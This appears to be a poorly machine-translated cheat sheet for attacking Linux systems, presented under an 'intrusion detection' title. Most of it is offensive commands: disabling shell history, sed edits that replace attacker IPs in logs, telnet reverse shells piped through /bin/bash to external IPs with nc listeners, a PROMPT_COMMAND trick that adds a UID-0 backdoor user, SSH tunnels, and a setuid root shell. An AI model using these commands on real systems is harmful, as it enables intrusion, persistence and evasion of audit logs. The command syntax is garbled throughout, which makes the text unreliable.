Some technical knowledge about Linux Intrusion Detection

1. Do not record history after logging on to ssh

Unset history histfile histsave histzone history histlog; export HISTFILE =/dev/null; export HISTSIZE = 0; export HISTFILESIZE = 0

2. Some evil uses of sed

It is an evil replacement to the logon IP address and the access IP address in the log.

Sed-s/211. xxx/192.168.1.1/g access_log access. log security

Attackers can add ssh-restricted logon users.

Sed-I s/AllowUsers fuck root oracle rqcuser/g sshd_config

However, after this addition, the sshd service must be forcibly restarted to take effect.

Lsof-I: 22. Find the sshd process ID.

COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME

Sshd 18662 root 11u IPv6 27925867 TCP *: ssh (LISTEN)

Sshd 31793 sshd 12u IPv6 34742994 TCP 192.168.1.2: ssh-> 192.168.1.5: 49080 (ESTABLISHED)

Then kill-SIGHUP 18662

3. Get the real ttyshell after returning the shell through webshell bounce

Python-c import pty; pty. spawn ("/bin/sh ")

Another method to obtain ttyshell

$ Cat sh. exp
#! /Usr/bin/CT
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
Spawn sh
Interact
Bash sh. exp

4. Perform reverse connections via TELNET:

Telnet [attacker_ipaddr] [port1]/bin/bash telnet [attacker_ipaddr] [port2]

Telnet 210.51.173.41 8080/bin/bash telnet 210.51.173.41 8081

/Usr/bin/telnet 203.93.28.236 8000/bin/bash/usr/bin/telnet 203.93.28.236 8001

Run the following command on 203.93.28.236:

Nc-l-p 8000
Nc-l-p 8001

/Usr/bin/telnet 192.168.1.100 8088/bin/bash/usr/bin/telnet 192.168.1.100 8089

5. curl download

The full command shoshould look something like this:

Curl-C-O http://www.mirror.com/path/to/NeoOffice-Patch.dmg

6. In Windows, the NC listens to linux and returns the shell command. The command cannot be properly wrapped.

Unalias ls

7. linux BASH Privilege Escalation

Export PROMPT_COMMAND = "/usr/sbin/useradd-o-u 0 kkoo &>/dev/null & echo kkoo: 123456/usr/sbin/chpasswd &>/dev/null & unset PROMPT_COMMAND"

8. ssh tunnel

Ssh-C-f-N-g-L listen_portST_HostST_port user @ Tunnel_Host

Ssh-C-f-N-g-R listen_portST_HostST_port user @ Tunnel_Host

Ssh-C-f-N-g-D listen_port user @ Tunnel_Host-f

9. Local rootshell

Bash and tcsh won't work, and Other ash bsh zsh ksh can work. The specific operation is relatively simple. Let's talk about cp/bin/ksh.; chown root. root ksh; chmod 4755 ksh, and then run ksh to obtain

Root permission. This action seems vulgar, but sometimes it is useful. Therefore, deleting excessive shells may increase the intrusion cost to some extent. If you do not implement the shell, you can consider

Add this operation